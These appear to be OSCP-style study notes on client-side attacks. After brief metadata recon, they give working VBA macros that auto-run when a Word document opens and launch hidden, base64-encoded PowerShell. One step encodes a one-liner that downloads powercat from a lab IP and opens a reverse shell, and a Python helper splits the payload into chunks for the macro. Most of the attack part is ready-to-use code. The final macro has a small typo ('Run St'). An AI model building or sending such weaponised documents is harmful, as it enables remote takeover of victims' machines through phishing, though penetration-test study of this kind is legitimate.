🧪
Client Side Attacks
Notes from oscp.adot8.com — cool.
#cool#adot8
source · oscp.adot8.com · cool/client-side-attacks ↗Client-side Attacks
code
01exiftool -a -u quote.pdf{% hint style="info" %} Passive recon viewing metadata of publicly available documents to view potential installed software on the target machine {% endhint %}
Use Canary Tokens to fingerprint the remote machine
{% embed url="https://canarytokens.org/generate" %}
Macros in Word documents
{% hint style="info" %} Save as .doc (Word 97-2003 Document) {% endhint %}
Open powershell
<pre><code>Sub AutoOpen() <strong> Mal </strong>End Sub Sub Document_Open() Mal <strong>End Sub </strong>Sub Mal() CreateObject("Wscript.Shell").Run "powershell" End Sub </code></pre>Reverse shell macro
Encode in base64
code
01echo "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.10/powercat.ps1');powercat -c 10.10.14.10 -p 1337 -e powershell" | base64Python script to break ouput into smaller chunks
code
01str = "powershell.exe -nop -w hidden -e <base64 output>"02n = 5003for i in range(0, len(str), n):04print("Str = Str + " + '"' + str[i:i+n] + '"')Final Macro script
<pre><code>Sub AutoOpen() MyMacro End Sub Sub Document_Open() <strong> MyMacro </strong>End Sub Sub MyMacro() Dim Str As String Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU" Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd" Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB" Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA" Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA" <strong> Str = Str + "A== " </strong>CreateObject("Wscript.Shell").Run St </code></pre>{% embed url="https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba" %}
{% embed url="https://github.com/k4sth4/Creating-a-Malicious-doc" %}